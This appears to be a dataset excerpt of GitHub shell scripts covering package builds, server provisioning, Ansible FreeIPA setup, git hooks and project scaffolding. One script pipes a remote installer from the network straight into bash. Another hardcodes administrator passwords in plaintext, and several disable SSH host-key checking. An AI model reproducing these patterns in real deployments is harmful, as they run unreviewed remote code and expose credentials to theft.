xml_filler "$common_src_main/res/values/strings.xml" "$pkg_dir/res/values/strings.xml"
| true
|
ec23a6937facedb2eb01c3908577400451fde8ac
|
Shell
|
zheddie/samplecodes
|
/src_C/linux/selfwrite/rpmProjects/build.sh
|
UTF-8
| 397
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
set -x
CURRENTDIR=`pwd`
HELLONAME=hello1-1.0
if [ "$1" == "hello" ]; then
if [ "$2" == "rpmbuild" ]; then
if [ ! -f ${HELLONAME}.tar.Z ]; then
tar czf ${HELLONAME}.tar.Z ${HELLONAME}
fi
#tar czf ${HELLONAME}.tar.Z --exclude="*.spec" ${HELLONAME}
cp ${HELLONAME}.tar.Z ~/rpmbuild/SOURCES/
rpmbuild -ba ${HELLONAME}/hello.spec --buildroot ~/rpmbuild/BUILDROOT -vv
fi
fi
| true
|
8907af13db219cbf891333ac3656c449f4a2bd4d
|
Shell
|
dlang/dconf.org
|
/netlify.sh
|
UTF-8
| 415
| 2.75
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSL-1.0"
] |
permissive
|
#!/usr/bin/env bash
# A small script to build dconf.org and allows previewing PRs with netlify
set -euox pipefail
DMD_VERSION="2.079.0"
BUILD_DIR="build"
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd "${DIR}"
. "$(curl -fsSL --retry 5 --retry-max-time 120 --connect-timeout 5 --speed-time 30 --speed-limit 1024 https://dlang.org/install.sh | bash -s install "dmd-${DMD_VERSION}" --activate)"
make
| true
|
a38ea3a69a0af77321a36a3969559bed767dc05f
|
Shell
|
CUCCS/2015-linux-public-kjAnny
|
/实验六:shell脚本编程练习进阶/scripts/install.sh
|
UTF-8
| 996
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
source /root/global-var.sh
apt-get update
if [ $? -ne 0 ] ; then
echo "Error : Fail to update"
exit 0
else
apt-get install debconf-utils
if [ $? -ne 0 ] ; then
echo "Error : Fail to install the packages"
exit 0
else
debconf-set-selections <<\EOF
proftpd-basic shared/proftpd/inetd_or_standalone select standalone
EOF
apt-get install -y proftpd nfs-kernel-server samba isc-dhcp-server bind9 expect
if [ $? -ne 0 ] ; then
echo "Error : Fail to install the packages"
exit 0
fi
fi
fi
# copy the configuration files
# FTP:proftpd
cp /etc/proftpd/proftpd.conf /etc/proftpd/proftpd.conf.bak
# NFS
cp /etc/exports /etc/exports.bak
# samba
cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
# DHCP
cp /etc/network/interfaces /etc/network/interfaces.bak
cp /etc/default/isc-dhcp-server /etc/default/isc-dhcp-server.bak
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bak
# DNS:bind9
cp /etc/bind/named.conf.local /etc/bind/named.conf.local.bak
| true
|
a5b90247a50325365dcbdb8509fe96f5f7a41aed
|
Shell
|
gmoshkin/dotfiles
|
/scripts/random_task.sh
|
UTF-8
| 304
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
if [ -z "$KEY" -o -z "$TOK" -o -z "$BID" ]; then
echo "KEY, TOK, BID vars aren't set (see ~/.config/trello-api-keys.conf)"
exit 1
fi
curl "https://api.trello.com/1/boards/${BID}/lists?filter=open&cards=open&key=${KEY}&token=${TOK}" |
jq '.[].cards|.[].name' -r | shuf | head -1
| true
|
798d2af498bc3cb19edb4d5dc284fe3d6c46d2df
|
Shell
|
hamidreza2000us/sitesetup
|
/01-initializeRHVM.sh
|
UTF-8
| 3,896
| 2.546875
| 3
|
[] |
no_license
|
#Copy SiteSetup to the /root
mkdir -p ~/SiteSetup/{Backups,Files,Images,ISOs,RPMs,Yaml}
cd /root/SiteSetup/Yaml
ansible-playbook -i .inventory uploadImage.yml
ansible-playbook -i .inventory create-vmFromImage.yml -e VMName=Template8.3 -e VMMemory=2GiB -e VMCore=1 \
-e ImageName=rhel-8.3-x86_64-kvm.qcow2 -e HostName=template8.3.myhost.com
ansible-playbook -i .inventory create-template.yml -e VMName=Template8.3 -e VMTempate=Template8.3
ansible-playbook -i .inventory create-vmFromTemplateWIP.yml -e VMName=idm -e VMMemory=4GiB -e VMCore=4 \
-e HostName=idm.myhost.com -e VMTempate=Template8.3 -e VMISO=rhel-8.3-x86_64-dvd.iso -e VMIP=192.168.1.112
scp -o StrictHostKeyChecking=no /root/SiteSetup/ISOs/rhel-8.3-x86_64-dvd.iso 192.168.1.112:~/
ssh -o StrictHostKeyChecking=no 192.168.1.112 "mount /root/rhel-8.3-x86_64-dvd.iso /mnt/cdrom"
ansible-galaxy collection install freeipa.ansible_freeipa
cat > /root/SiteSetup/Yaml.inventory << EOF
[hosts]
rhvm.myhost.com
rhvh01.myhost.com
[ipaserver]
192.168.1.112
[ipaserver:vars]
ipaserver=idm.myhost.com
ipaserver_ip_addresses=192.168.1.112
ipaserver_hostname=idm.myhost.com
ipaserver_domain=myhost.com
ipaserver_realm=MYHOST.COM
ipaserver_setup_dns=true
ipaserver_auto_forwarders=true
ipadm_password=Iahoora@123
ipaadmin_password=Iahoora@123
ipaserver_setup_dns=true
ipaserver_no_host_dns=true
ipaserver_auto_reverse=true
ipaserver_no_dnssec_validation=true
ipaserver_forwarders=192.168.1.1
ipaserver_reverse_zones=1.168.192.in-addr.arpa.
ipaserver_allow_zone_overlap=true
[ipaclients]
192.168.1.113
[ipaclients:vars]
ipaclient_domain=myhost.com
ipaadmin_principal=admin
ipaadmin_password=Iahoora@123
ipasssd_enable_dns_updates=yes
ipaclient_all_ip_addresses=yes
ipaclient_mkhomedir=yes
ipaserver_ip_addresses=192.168.1.112
EOF
#cd ~/.ansible/collections/ansible_collections/freeipa/ansible_freeipa/roles/ipaserver/
#ansible-playbook -i .inventory ~/.ansible/collections/ansible_collections/freeipa/ansible_freeipa/playbooks/install-server.yml
ssh 192.168.1.112 "yumdownloader ansible-freeipa-0.1.12-6.el8"
scp 192.168.1.112:~/ansible-freeipa-0.1.12-6.el8.noarch.rpm /root/SiteSetup/RPMs/
yum localinstall -y /root/SiteSetup/RPMs/ansible-freeipa-0.1.12-6.el8.noarch.rpm
cat > /root/SiteSetup/Yaml/ansible.cfg << EOF
[defaults]
roles_path = /usr/share/ansible/roles
library = /usr/share/ansible/plugins/modules
module_utils = /usr/share/ansible/plugins/module_utils
EOF
cat > /root/SiteSetup/Yaml/setupIDM.yml << EOF
---
- name: Playbook to configure IPA server
hosts: ipaserver
become: true
# vars_files:
# - playbook_sensitive_data.yml
roles:
- role: ipaserver
state: present
EOF
cd /root/SiteSetup/Yaml
ansible-playbook -i .inventory setupIDM.yml
####################################################################
cd /root/SiteSetup/Yaml
ansible-playbook -i .inventory create-vmFromImage.yml -e VMName=Template7.9 -e VMMemory=2GiB -e VMCore=1 -e ImageName=rhel-server-7.9-x86_64-kvm.qcow2 -e HostName=template7.9.myhost.com
ansible-playbook -i .inventory create-template.yml -e VMName=Template7.9 -e VMTempate=Template7.9
ansible-playbook -i .inventory create-vmFromTemplateWIP-satellite.yml -e VMName=satellite -e VMMemory=16GiB -e VMCore=6 -e HostName=satellite.myhost.com -e VMTempate=Template7.9 -e VMISO=rhel-server-7.9-x86_64-dvd.iso -e VMIP=192.168.1.113 -e VMDNS=192.168.1.112
ssh -o StrictHostKeyChecking=no 192.168.1.113
cat > setupIDMClient.yml << EOF
- name: Playbook to configure IPA clients with username/password
hosts: ipaclients
become: true
roles:
- role: ipaclient
state: present
EOF
ansible-playbook -i .inventory setupIDMClient.yml
scp -o StrictHostKeyChecking=no /root/SiteSetup/ISOs/satellite-6.8.0-rhel-7-x86_64-dvd.iso 192.168.1.113:~/
ssh -o StrictHostKeyChecking=no 192.168.1.113 "cd /mnt/sat/ && ./install_packages"
ansible-galaxy install oasis_roles.satellite
| true
|
61ec1d3038b0ca2af7a17487783fd38b0983f136
|
Shell
|
hi-sasaki/clean-architecture-golang-sample
|
/.pre-commit
|
UTF-8
| 346
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
gofiles=$(git diff --cached --name-only --diff-filter=ACM | grep '.go$')
[ -z "$gofiles" ] && exit 0
echo "gofmt -s -w $gofiles"
unformatted=$(gofmt -l -w $gofiles)
[ -z "$unformatted" ] && exit 0
echo >&2 "Info: Running gofmt as some Go files are not formatted with gofmt."
for fn in $unformatted; do
git add $fn
done
exit 0
| true
|
b8e1421672bc93f88ad744f32f48e554a44bc3b6
|
Shell
|
SalomonBrys/Scripts
|
/bin/java_home
|
UTF-8
| 189
| 3.5
| 4
|
[] |
no_license
|
#!/bin/sh
jcPath=$(which javac 2> /dev/null)
if [ $? != 0 ]; then
>&2 echo "Could not find javac. Is the JDK installed ?"
exit 1
fi
realpath $(dirname $(readlink -f $jcPath))/..
| true
|
5c5ee7b3368bda09879384b91e4f56e94d2e6440
|
Shell
|
carriejv/init-ts
|
/init-ts.sh
|
UTF-8
| 5,436
| 4.21875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Initializes a new Typescript repo with a minimal config.
INITTS_REPO="https://github.com/carriejv/init-ts.git"
SPDX_LICENSE_REPO="https://raw.githubusercontent.com/spdx/license-list-data/master/text/"
T_PROMPT=`tput setaf 6`
T_STEP=`tput setaf 2`
T_ERR=`tput setaf 1`
T_RESET=`tput sgr0`
# Error handler
# error [status-code=1] [cleanup]
error() {
echo "$1"
if [[ ! -z "$3" ]]; then
cd ..
rm -rf "$3"
fi
exit ${2:-1}
}
# Check dependencies
MISSING_DEPS=0
for dep in sed curl npm git; do
if ! command -v $dep>/dev/null 2>&1; then
echo "${T_ERR}Missing required dependency [${T_RESET}${dep}${T_ERR}]."
MISSING_DEPS=1
fi
done
if [[ 1 -eq $MISSING_DEPS ]]; then
error "${T_ERR}Exiting...${T_RESET}"
fi
# Make project dir and get package info
read -p "${T_PROMPT}Enter package name: ${T_RESET}" PKGNAME
if [[ -z "$PKGNAME" ]]; then
error "${T_ERR}Package name is required. Exiting...${T_RESET}"
fi
if [[ -d "$PKGNAME" ]]; then
error "${T_ERR}Directory [${T_RESET}${PWD}/${PKGNAME}${T_ERR}] already exists. Exiting...${T_RESET}"
fi
read -p "${T_PROMPT}Enter project description: ${T_RESET}" PKGDESC
if [[ -z "$PKGDESC" ]]; then
error "${T_ERR}Package description is required. Exiting...${T_RESET}"
fi
read -p "${T_PROMPT}Enter project license (spdx id) [${T_RESET}Apache-2.0${T_PROMPT}]: ${T_RESET}" PKGLICENSE
PKGLICENSE=${PKGLICENSE:-"Apache-2.0"}
read -p "${T_PROMPT}Enter remote repo url (not including .git) [${T_RESET}https://github.com/carriejv/${PKGNAME}${T_PROMPT}]: ${T_RESET}" REMOTEREPO
REMOTEREPO=${REMOTEREPO:-"https://github.com/carriejv/$PKGNAME"}
read -p "${T_PROMPT}Enter developer name [${T_RESET}Carrie J V${T_PROMPT}]: ${T_RESET}" DEVNAME
DEVNAME=${DEVNAME:-"Carrie J V"}
read -p "${T_PROMPT}Enter developer email [${T_RESET}carrie@carriejv.com${T_PROMPT}]: ${T_RESET}" DEVEMAIL
DEVEMAIL=${DEVEMAIL:-"carrie@carriejv.com"}
read -p "${T_PROMPT}Enter developer website url [${T_RESET}https://www.carriejv.com${T_PROMPT}]: ${T_RESET}" DEVURL
DEVURL=${DEVURL:-"https://www.carriejv.com"}
mkdir -p "$PKGNAME"
cd "$PKGNAME"
# Clone init-ts repo.
echo "[1/5] ${T_STEP}Cloning [${T_RESET}${INITTS_REPO}${T_STEP}] into project directory...${T_RESET}"
git clone $INITTS_REPO .
mv package-template.json package.json
rm init-ts.sh
rm package-lock.json
# Generate a README and LICENSE
echo "[2/5] ${T_STEP}Generating README and LICENSE files...${T_RESET}"
echo "# $PKGNAME
TODO: Everything (literally).
# License
[$PKGLICENSE]($REMOTEREPO/blob/master/LICENSE)" > README.md
curl -sL --write-out "%{http_code}" "$SPDX_LICENSE_REPO/$PKGLICENSE.txt" > LICENSE
STATUS_CODE=$(sed -n '$p' LICENSE)
if [[ "200" != "$STATUS_CODE" ]]; then
error "${T_ERR}Could not find license text for [${T_RESET}${PKGLICENSE}${T_ERR}] at [${T_RESET}${SPDX_LICENSE_REPO}/${PKGLICENSE}.txt${T_ERR}]. Exiting...${T_RESET}" 1 "$PKGNAME"
fi
sed -i -E 's/[1-5][0-9]{2}//gm' LICENSE
# Warn about weird licenses.
if [[ "MIT ISC BSD GPL Apache-2.0" != *"$PKGLICENSE"* ]]; then
echo "License autofill is untested with [$PKGLICENSE]."
echo "The script will make its best effort, but please double check!"
fi
sed -i -E "s/\<copyright holders\>|\<owner\>/$DEVNAME/gm" LICENSE
sed -i -E "s/\<year\>/$(date +'%Y')/gm" LICENSE
# Stick Apache-2.0 header on index.ts
if [[ "Apache-2.0" == "$PKGLICENSE" ]]; then
TEMP_FILE=$(mktemp)
echo "/**
* Copyright [yyyy] [name of copyright owner]
*
* Licensed under the Apache License, Version 2.0 (the \"License\");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an \"AS IS\" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/" > "$TEMP_FILE"
sed -i -E "s/\[name of copyright owner\]/$DEVNAME/gm" "$TEMP_FILE"
sed -i -E "s/\[yyyy\]/$(date +'%Y')/gm" "$TEMP_FILE"
cat src/index.ts >> "$TEMP_FILE"
cp "$TEMP_FILE" src/index.ts
fi
# Fill in package info.
echo "[3/5] ${T_STEP}Substiting package info...${T_RESET}"
# Recursively sed subsitute provided pkg info into default files from repo.
# _sub_user_info_item key value directory
_sub_user_info_item() {
for file in "$3"/*; do
if [[ -d "$file" ]]; then
_sub_user_info_item "$1" "$2" "$3/$file"
else
sed -i "s#%$1%#$2#gm" "$file"
fi
done
}
for subitem in PKGNAME PKGDESC DEVNAME DEVEMAIL DEVURL REMOTEREPO PKGLICENSE; do
_sub_user_info_item "$subitem" "${!subitem}" .
done
# Force update npm dependencies and build + test the base repo
echo "[4/5] ${T_STEP}Updating NPM dependencies to latest and validating build/test...${T_RESET}"
npm update --save/--save-dev --force
npm run test
if [[ 0 -ne $? ]]; then
error "${T_ERR}Encountered an error running tests. Exiting...${T_RESET}" 1 "$PKGNAME"
fi
echo "[5/5] ${T_STEP}Scrapping init-ts .git and initializing a fresh git repo...${T_RESET}"
rm -rf .git
git init
echo "This script does not make an initial commit or set the remote repo."
echo "${T_STEP}Successfully initialized [${T_RESET}${PKGNAME}${T_STEP}]!${T_RESET}"
| true
|
c6cbc36329ac3466e0072e7aa6ca8050386953ab
|
Shell
|
willneedit/rockchip-mkbootimg
|
/mkcpiogz
|
UTF-8
| 303
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/sh
# Create initramfs.cpio.gz
# Author: Julien Chauveau <julien.chauveau@neo-technologies.fr>
# Usage: mkcpiogz <directory>
if [ $# != 1 ] || [ ! -d $1 ]; then
echo "Usage: ${0##*/} <directory>" ; exit 1
fi
cd $1
DIR=$(pwd)
IMG=$DIR.cpio.gz
sudo sh -c "find . | cpio -H newc -o | gzip -9 > $IMG"
echo "Archive created: $IMG"
| true
|
f776ff6af71ca5fcd4f6dc99cde44447ba518b42
|
Shell
|
jiajunhuang/4.4BSD-Lite2
|
/usr/src/contrib/news/inn/samples/send-uucp
|
UTF-8
| 2,279
| 3.53125
| 4
|
[
"BSD-4-Clause-UC",
"LicenseRef-scancode-other-permissive",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#! /bin/sh
## $Revision: 1.11 $
## SH script to send UUCP batches out.
## =()<. @<_PATH_SHELLVARS>@>()=
. /var/spool/news/data/innshellvars
PROGNAME=`basename $0`
LOCK=${LOCKS}/LOCK.${PROGNAME}
LOG=${MOST_LOGS}/${PROGNAME}.log
MAXJOBS=200
UUXFLAGS="- -r -gd"
## Start logging.
test ! -f ${LOG} && touch ${LOG}
chmod 0660 ${LOG}
exec >>${LOG} 2>&1
echo "${PROGNAME}: [$$] begin `date`"
cd ${BATCH}
## Anyone else there?
trap 'rm -f ${LOCK} ; exit 1' 1 2 3 15
shlock -p $$ -f ${LOCK} || {
echo "${PROGNAME}: [$$] locked by [`cat ${LOCK}`]"
exit 0
}
## Who are we sending to?
if [ -n "$1" ] ; then
LIST="$*"
else
LIST=""
case `date +%H` in
01|04|07|21|23)
LIST="kurz-ai aoa clsib21 leafusa metasoft"
;;
06|12|15|17|20)
LIST="esca"
;;
esac
fi
case ${HAVE_UUSTAT} in
DONT)
TEMP=${TMPDIR}/uuq$$
uuq -h |tr -d : >${TEMP}
;;
esac
## Do the work...
for SITE in ${LIST}; do
## See if any data is ready for host.
BATCHFILE=${SITE}.uucp
if [ -f ${SITE}.work ] ; then
cat ${SITE}.work >>${BATCHFILE}
rm -f ${SITE}.work
fi
mv ${SITE} ${SITE}.work
ctlinnd -s -t30 flush ${SITE} || continue
cat ${SITE}.work >>${BATCHFILE}
rm -f ${SITE}.work
if [ ! -s ${BATCHFILE} ] ; then
echo "${PROGNAME}: [$$] no articles for ${SITE}"
rm -f ${BATCHFILE}
continue
fi
## Get number of jobs for the current site.
case ${HAVE_UUSTAT} in
DONT)
JOBS=`${AWK} \
'BEGIN{X=0} {if ($1 == "'$SITE'") X=$2} END{print X}' <${TEMP}`
;;
DO)
JOBS=`uustat -s${SITE} | grep rnews | wc -l`
;;
*)
JOBS=0
;;
esac
if [ ${JOBS} -ge ${MAXJOBS} ] ; then
echo "${PROGNAME}: [$$] ${JOBS} files already queued for ${SITE}"
continue
fi
QUEUEJOBS=`expr ${MAXJOBS} - ${JOBS}`
## Get the compression flags.
echo "${PROGNAME}: [$$] begin ${SITE}"
case "${SITE}" in
esca)
COMPRESS="compress -b12"
;;
*)
COMPRESS="compress"
;;
esac
time batcher -N ${QUEUEJOBS} \
-p"(echo '#! cunbatch' ; exec ${COMPRESS} ) | uux ${UUXFLAGS} %s!rnews" \
${SITE} ${BATCHFILE}
echo "${PROGNAME}: [$$] end ${SITE}"
done
case ${HAVE_UUSTAT} in
DONT)
rm -f ${TEMP}
;;
esac
## Remove the lock file.
rm -f ${LOCK}
echo "${PROGNAME}: [$$] end `date`"
| true
|
74edaca7f05aa326a8e97b6c14e5233eabf56df7
|
Shell
|
awslabs/libfabric-ci-scripts
|
/install-nccl-tests.sh
|
UTF-8
| 782
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
NCCL_TESTS_VERSION="v2.0.0"
cd $HOME
git clone -b "$NCCL_TESTS_VERSION" https://github.com/NVIDIA/nccl-tests
pushd nccl-tests
# TODO: We need to apply the patch in commit https://github.com/NVIDIA/nccl-tests/commit/0f173234bb2837327d806e9e4de9af3dda9a7043
# to add the LD_LIBRARY_PATH of openmpi shipped in efa installer (ended as lib64 on fedora distros). This commit is merged
# in nccl-tests's main branch but not in any stable release. Update the version number when this fix is taken in and remove
# this patch line.
sed -i s/'NVLDFLAGS += -L$(MPI_HOME)\/lib -lmpi'/'NVLDFLAGS += -L$(MPI_HOME)\/lib -L$(MPI_HOME)\/lib64 -lmpi'/ src/Makefile
make MPI=1 MPI_HOME=/opt/amazon/openmpi NCCL_HOME=$HOME/nccl/build NVCC_GENCODE="-gencode=arch=compute_80,code=sm_80"
popd
| true
|
b137fc355c64370fe81f502f27e038923d90eccd
|
Shell
|
u16suzu/dot_files
|
/.zsh/setting/command.sh
|
UTF-8
| 688
| 3.421875
| 3
|
[] |
no_license
|
### git add と commit を同時にやる
git_add_commit(){
zle accept-line
git add . && git commit -m $1;
}
zle -N git_add_commit
alias ga="git_add_commit"
### 画像を開く
open_image_with_preview(){
zle accept-line
if [[ -z "$BUFFER" ]]; then
open -a preview $1;
fi
}
zle -N open_image_with_preview
alias open_image="open_image_with_preview"
### 何も入力しないで enter を押すと ls を実行
alls() {
zle accept-line
if [[ -z "$BUFFER" ]]; then
echo ''
ls
fi
}
zle -N alls
bindkey "\C-m" alls
### ディレクトリ作成と移動を同時に行う
mkcd() {
mkdir -p "$1" && cd "$_"
}
| true
|
190e6a35c0628b774671fd1de256acf9a483aeed
|
Shell
|
Gimba/BashUtils
|
/prod_25C
|
UTF-8
| 577
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
if [ ! -d "productions" ]; then
mkdir productions
fi
infile=${PWD##*/}
# if [ "$#" -gt 2 ]; then
# infile=$3
# fi
# echo $infile
path=${PWD}
for i in $(seq $1 $2)
do
last=$((i-1))
pmemd.cuda -O -i /d/as2/u/rm001/BashUtils/InputFiles/prod_25C.in -p $infile.prmtop -c productions/prod_$last.rst -o productions/prod_$i.out -r productions/prod_$i.rst -x productions/prod_$i.nc -inf productions/prod_$i.info
if [ -f productions/prod_$2.rst ]; then
echo " " | mailx -s "$HOST $CUDA_VISIBLE_DEVICES: $path $infile production $i finished" ucbtmc7@ucl.ac.uk
fi
done
| true
|
7cfeb119a069291a6d713f2aa70ba5963d0ec376
|
Shell
|
janikvonrotz/lorauna
|
/task
|
UTF-8
| 487
| 3.765625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
set -eo pipefail
# load env vars
if [ -f .env ]
then
export $(cat .env | sed 's/#.*//g' | xargs)
fi
function help() {
echo
echo "$1 <command> [options]"
echo
echo "commands:"
echo
column -t -s"|" ./task.md | tail -n +3
echo
}
function install() {
npm install
}
case "$1" in
install)
install
;;
dump)
. ./scripts/mongo-dump
;;
restore)
./scripts/mongo-restore
;;
*)
help task
exit 1
esac
| true
|
759626cc54e26dd0240f11a61f01721634b29764
|
Shell
|
shangwen/StandaloneOnYarn
|
/bin/standalone-yarn.sh
|
UTF-8
| 458
| 2.828125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
SCRIPT_DIR="$(cd "$(dirname "$0")"; pwd)"
export STANDALONE_ON_YARN_HOME="$(cd "$SCRIPT_DIR/.."; pwd)"
if [ $1 = "startAmServer" ] ; then
echo $STANDALONE_ON_YARN_HOME/lib/standalone-yarn-0.1.jar
hadoop jar $STANDALONE_ON_YARN_HOME/standalone-yarn-0.1.jar com.jd.bdp.yarn.client.StandaloneYarn startAmServer
else
hadoop jar $STANDALONE_ON_YARN_HOME/standalone-yarn-0.1.jar com.jd.bdp.yarn.client.StandaloneYarn $1 $2 $3
fi
| true
|
edc4195f8cef3898d9d347dfb6796986a16baafc
|
Shell
|
mmitrik/github-actions
|
/login/entrypoint.sh
|
UTF-8
| 647
| 3.5
| 4
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
#!/bin/bash
set -e
if [[ -n "$AZURE_SERVICE_APP_ID" ]] && [[ -n "$AZURE_SERVICE_PASSWORD" ]] && [[ -n "$AZURE_SERVICE_TENANT" ]]
then
az login --service-principal --username "$AZURE_SERVICE_APP_ID" --password "$AZURE_SERVICE_PASSWORD" --tenant "$AZURE_SERVICE_TENANT"
else
echo "One of the required parameters for Azure Login is not set: AZURE_SERVICE_APP_ID, AZURE_SERVICE_PASSWORD, AZURE_SERVICE_TENANT." >&2
exit 1
fi
if [[ -n "$AZURE_SUBSCRIPTION" ]]
then
az account set --s "$AZURE_SUBSCRIPTION"
else
SUBSCRIPTIONS=$(az account list)
if [[ ${#SUBSCRIPTIONS[@]} > 1 ]]
then
echo "AZURE_SUBSCRIPTION is not set." >&2
exit 1
fi
fi
| true
|
4a56fb83b39b38b0d51cffb37c9e832c152e9e52
|
Shell
|
supreet-s8/VISP
|
/GuavusTools/bin/INSTALL/list-job-times-new.sh
|
UTF-8
| 543
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
COL1VIP=`/opt/tps/bin/pmx.py subshell hadoop show config | grep 'master' | awk -F":" '{print $NF}'| sed -e 's/\s//g'`
SSH="ssh -q -o ConnectTimeout=10 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null"
for i in `$SSH root@$COL1VIP "/opt/tps/bin/pmx.py subshell oozie show config all | grep jobStart" | awk -F'/jobStart' '{print $1}' | sed -e 's/^\s*//g'`
do
printf "$i\t\t: "
$SSH root@$COL1VIP "/opt/hadoop/bin/hadoop dfs -cat /data/$i/done.txt 2>/dev/null"
if [[ $? -ne '0' ]]; then echo "JOB, YET TO RUN!"; fi
done
| true
|
881297d462b2f3b6707c28e4cec1b2f24bf29c20
|
Shell
|
liqiang76/tinyos_cxl
|
/apps/breakfast/bacon/cxUnitTests/cxl/testLink/reliabilityTest.sh
|
UTF-8
| 1,261
| 3.953125
| 4
|
[] |
no_license
|
#!/bin/bash
#input: src, dest, failure rate p
# number of trials (selections of nodes)
if [ $# -lt 4 ]
then
echo "Usage: $0 db src dest failureRate" 1>&2
exit 1
fi
db=$1
src=$2
dest=$3
fr=$4
numTrials=10
txPerTrial=20
function sendCommandGeneric(){
delay=$1
id=$2
shift 2
s="$@"
for (( i=0; i<${#s}; i++ ))
do
echo "${s:$i:1}" | nc localhost $((17000 + $id))
sleep $delay
done
}
function sendCommandNoDelay(){
sendCommandGeneric 0 $@
}
function resetNetwork(){
for node in $(seq 60)
do
sendCommandNoDelay $node q
done
}
function tx(){
#0.4 delay is to let the tx finish: 10 hops, ~31 ms per hop=0.3 S
sendCommandGeneric 0.4 $1 t
}
for setup in "cx" "sp"
do
setupStart=$(date +%s)
echo "$setupStart SETUP_START $setup $src $dest $fr"
resetNetwork
for i in $(seq $numTrials)
do
#on each TX, randomly set up the nodes to sleep or rx/forward.
#this simulates a single connection.
trialStart=$(date +%s)
python randomize.py $db $setup $src $dest $fr | while read nodeCommand
do
echo "$trialStart TRIAL $setupStart $nodeCommand"
sendCommandNoDelay $nodeCommand
done
sleep 0.1
for k in $(seq $txPerTrial)
do
tx $src
done
sleep 1.5
done
done
| true
|
de82eee35881ed25c48c983fabef270eb07d83fa
|
Shell
|
jrkwon/LAB
|
/workspace_temp/scripts/copy/copy_wflw_images.sh
|
UTF-8
| 255
| 3.046875
| 3
|
[
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
# Copy images from ~/Download and untar
FILE=$1
TARGET_DIR=./datasets/$FILE
mkdir -p $TARGET_DIR
cp ~/Downloads/${FILE}_images.tar.gz $TARGET_DIR/.
TAR_FILE_ANNO=$TARGET_DIR/${FILE}_images.tar.gz
tar -zxvf $TAR_FILE_ANNO -C $TARGET_DIR
rm $TAR_FILE_ANNO
| true
|
623e31751f8f81257cb9abb243292d66f972a306
|
Shell
|
scarfacedeb/setup_linux
|
/install
|
UTF-8
| 197
| 2.9375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#
# Install general apps
set -e
SETUP_ROOT=$(pwd)
. functions.sh
setup_system () {
chsh -s /usr/bin/zsh
}
#sudo bash -c "source $SETUP_ROOT/apt.sh"
. apt.sh
setup_system
| true
|
fd992788565ea1d179bbdc616f4a11533d48ffe2
|
Shell
|
gfontenot/xcode-cli
|
/src/commands/xcode-open
|
UTF-8
| 981
| 4.28125
| 4
|
[] |
no_license
|
#!/bin/sh
error(){
red="\e[1;31m"
reset="\e[0m"
printf "${red}%s${reset}\n" "$1" >&2
}
info(){
printf "%s\n" "$1"
}
usage='xcode-open
Open a directory with Xcode
usage: xcode-open [-h | --help] [--current | --beta] [PATH]
-h | --help Print this usage documentation and exit
--current DEFAULT - Use the currently selected Xcode version.
--beta Use the newest beta version of Xcode.
PATH The path to the directory containing the Xcode project.
If not provided, will default to the current directory.
'
app=$(xcode-version --path)
case $1 in
--current)
shift
;;
--beta)
app=$(xcode-list | sort -r | grep -m 1 'beta')
shift
;;
esac
case $1 in
--current|--beta)
error "Invalid configuration, can't specify multiple Xcode applications"
exit 1
;;
--help|-h)
info "$usage"
exit 0
;;
esac
target=${1:-"."}
open -a "$app" "$target"
| true
|
9c82921940ab4aee38ffd2817d5a47c4e691defa
|
Shell
|
FlorianHeigl/wp3-image-synthesis
|
/image-optimizer/src/main/resources/scripts/umountImage.sh
|
UTF-8
| 1,134
| 3.46875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Copyright 2009-10 Gabor Kecskemeti, University of Westminster, MTA SZTAKI
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Parameters:
# 1. complete path to the VMI to be mounted
# 2. mount point
if [ "$#" -ne 2 ]; then
echo "Illegal number of parameters"
exit 243
fi
modprobe nbd
SOURCE_IMGFN=$1
MOUNT_TARGET=$2
#Original VA handling
VOLID=`mount | grep "$MOUNT_TARGET" | cut -f1 -d' ' | cut -f4 -d/ | cut -f1 -d-`
umount $MOUNT_TARGET
vgchange -an $VOLID &> /dev/null
IMGFNBASENAME=`basename $SOURCE_IMGFN`
nbdpid=`ps ux | awk "/qemu-nbd/&&/$IMGFNBASENAME/&&!/awk/ { print \\$2 } "`
kill $nbdpid
| true
|
3a179c009826153f5e05147b70126b7806c85a6a
|
Shell
|
siberblog/linux
|
/hands-on/arg.sh
|
UTF-8
| 158
| 2.984375
| 3
|
[] |
no_license
|
#! /bin/bash
clear
function yasi_yaz(){
local dogum_yili
read -p "Dogum yili giriniz: " dogum_yili
let yas=$1-$dogum_yili
echo $yas
}
yasi_yaz 2020
| true
|
143b655ffd338d06c8c072d8860b1c062b1811a8
|
Shell
|
snailium/nanopi_tryout
|
/duo/00_prepare.sh
|
UTF-8
| 157
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/bash
SUDO=
